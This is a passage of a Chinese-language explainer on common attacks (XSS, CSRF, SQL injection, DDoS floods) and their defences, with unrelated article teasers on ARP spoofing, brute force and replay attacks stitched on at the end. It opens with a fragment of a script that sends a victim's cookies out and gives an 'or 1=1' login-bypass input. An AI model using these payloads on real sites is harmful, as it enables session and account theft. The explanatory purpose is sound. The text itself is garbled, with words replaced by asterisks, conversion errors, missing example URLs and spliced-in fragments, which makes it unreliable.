location.href=
""+document.cookie<
/script>
<
/script>
竊取cookie只是危害之一,攻擊者也可偽造表單騙取使用者填寫比較隱私的資訊從而達到竊取的目的。第三種,也是比較常見的,一般表現為刷廣告,即在某個**嵌入一段可以顯示指令碼或者文章的指令碼**。
跨站請求偽造(cross site request forgery),攻擊者通過騙取使用者訪問乙個曾經認證過的**,然後執行一些非法操作,如轉錢。譬如某個支付機構設計的乙個低能的轉賬請求如下:
並且,使用者曾對abc.com認證過,譬如記住賬號密碼,此時攻擊者可以在它的**偽造個鏈結或者放一張,其鏈結如下,由於攻擊者曾認證過,該操作被視為合法,攻擊者獲得10元。
攻擊者&money=100咋一看csrf和xss很像,其實確實有點像,不過xss利用的是使用者對**的信任,而csrf利用的是服務對使用者瀏覽器的信任。
csrf的防範策略有三,一種是利用http報文中的referer欄位,用於標識請求的**位址,通過檢查referer欄位,讓只有合法的請求**才能有執行的許可權。第二種則是token,最簡單的方式服務端隨機出隨機數,並要求每個請求都帶上。第三種則是輸入驗證碼,這種手段也比較常見了。
sql注入也是比較爛大街的攻擊手段了,利用的是sql語句的執行漏洞。如下,當我account填入a or 1=1,pwd填入c or 1 =1,則變成條件永遠成立了,從而可以執行某個使用者的操作。
select *
from user where account=
a and pwd =
bselect *
from user where
(account=
a or 1=1
)and
(pwd =
b or 1=1
)
這種攻擊也比較好處理,sql語句預編譯,正則過濾請求中的特殊字元,或者對一些特殊符號預先轉換。
分布式拒絕服務攻擊(distributed denial of service),能做這種攻擊且成功的,一般攻擊者花費的成本也會不少。它利用多台伺服器在某個瞬間內傳送大量請求至某個目標伺服器中,從而耗費你的伺服器資源,讓你的服務癱瘓。
這種一般比較很難解決,如果是針對ip進訪問限制,有時會誤傷友軍。最常見的攻擊形式有如下幾種。 syn/ack flood 最經典最有效的利用 tcp 協議的 ddos 攻擊手段,可通殺各種系統的網路服務:
1. syn flood(半連線攻擊):我們的tcp連線雖然可靠,但也有不可靠之處。tcp請求中,我們傳送syn幀之後,服務端傳送ack+syn應答。如果客戶端端方syn就立即掉線,服務端還是會傻傻的的等待一段時間即syn timeout。syn flood說的就是攻擊者利用上述的漏洞,用大量主機模擬這種情況,從而讓目標伺服器不能正常工作。
可以通過縮短 syn timeout 時間,降低伺服器負荷;設定 syn cookie,記錄請求連線的 ip位址,丟棄來自某個/些 ip 的重複 syn 報文;
2. ack flood:ack flood說的就是tcp正常連線後,由於大量主機傳送請求,服務端忙於接受報文,判斷請求狀態,向應從請求(傳送rst應答或者ack應答),從而無法正常執行其他請求,最終讓其他服務癱瘓。
沒有針對性的防禦方案,可以通過分析請求的報文,設定專門的應答策略。
3. tcp 全連線攻擊,這種攻擊方式也是成本也是比較高的,首先你的瀏覽器一般預設的tcp鏈結最大為8,再者你的伺服器tcp連線數也會有乙個限制,這意味你需要很多主機來模擬這種請求。對於攻擊目標而言,目標伺服器的 tcp 連線數也是有限的,一旦你的服務壓不過攻擊者,那你的**則會非常緩慢甚至無法訪問。
根據實際情況設定tcp 新建連線速率、異常報文數閾值,超過該閾值啟動防禦;針對源進行統計,如果某個源 ip 在指定的時間間隔內發起的 tcp 新建連線數超過了閾值,則將該源 ip 加入黑名單; 針對報文數進行檢查,如果特定時間內通過的報文數小於閾值則判定為異常會話,如果指定時間內某個源 ip 異常會話超過了閾值,則該源 ip 加入黑名單。
4. cc(challenge collapsar)攻擊又稱http flood,這種請求也不是很好處理,應為它就像量比較大的正常請求,不過有跡可循的是,在某個時間段內,它集中於攻擊**裡頭需要較長計算時間的請求,使你的服務達到瓶頸。
**頁面靜態化,針對開銷較大的資源,針對某個ip限制訪問問頻率、避免資料庫慢查詢、選擇適合的快取、訊息佇列等。5. icmp(internet control message protocol),即 internet 控制報文協議,在短時間內,攻擊者向目的主機傳送大量 ping 包,消耗主機資源,主機資源耗盡後就會癱瘓或者無法提供其他服務。
通過禁用icmp解決,有些**你會發現雖然ping不通,但它正常服務是沒有問題的
判斷包大小,如果是大包攻擊,則使用防止 udp 碎片方法:根據攻擊包大小設定包碎片重組大小,通常不小於1500;在極端情況下,可以考慮丟棄所有 udp 碎片。攻擊埠為業務埠:根據該業務 udp 最大包長設定 udp 最大包大小以過濾異常流量;攻擊埠為非業務埠則丟棄所有 udp 包,可能會誤傷正常業務;建立 udp 連線規則,要求所有去往該埠的 udp 包,必須首先與 tcp 埠建立 tcp 連線。
常見的網路攻擊
原理 針對交換機的mac位址學習機制,攻擊者通過偽造的源mac位址資料報傳送給交換機,造成交換機學習到了錯誤的mac位址與埠的對映關係,導致交換機要傳送到正確目的地的資料報被傳送到了攻擊者的主機上,攻擊者主機通過安裝相關的嗅探軟體,可獲得相關的資訊以實現進一步的攻擊。預防 通過在交換機上配置靜態條目...
網路常見攻擊型別
一 密碼暴力破解攻擊 密碼暴力破解 攻擊的目的是破解使用者的密碼,從而進入伺服器獲取系統資源或進行系統破壞。例如,黑客可以利用一台高效能的計算機,配合乙個資料字典庫,通過排列組合演算法嘗試各種密碼,最終找到能夠進行系統的密碼,登入系統獲取資源或進行資訊篡改。現在網路上有很多類似這種暴力破解密碼的軟體...
幾種簡單的網路攻擊介紹
arp欺騙攻擊 分為對路由器arp表的欺騙和對內網pc的閘道器欺騙。第一種arp欺騙的原理是 截獲閘道器資料。第二種arp欺騙的原理是 偽造閘道器。重放攻擊 重放攻擊 replay attacks 又稱重播攻擊 回放攻擊或新鮮性攻擊 freshnessattacks 是指攻擊者傳送乙個目的主機已接收...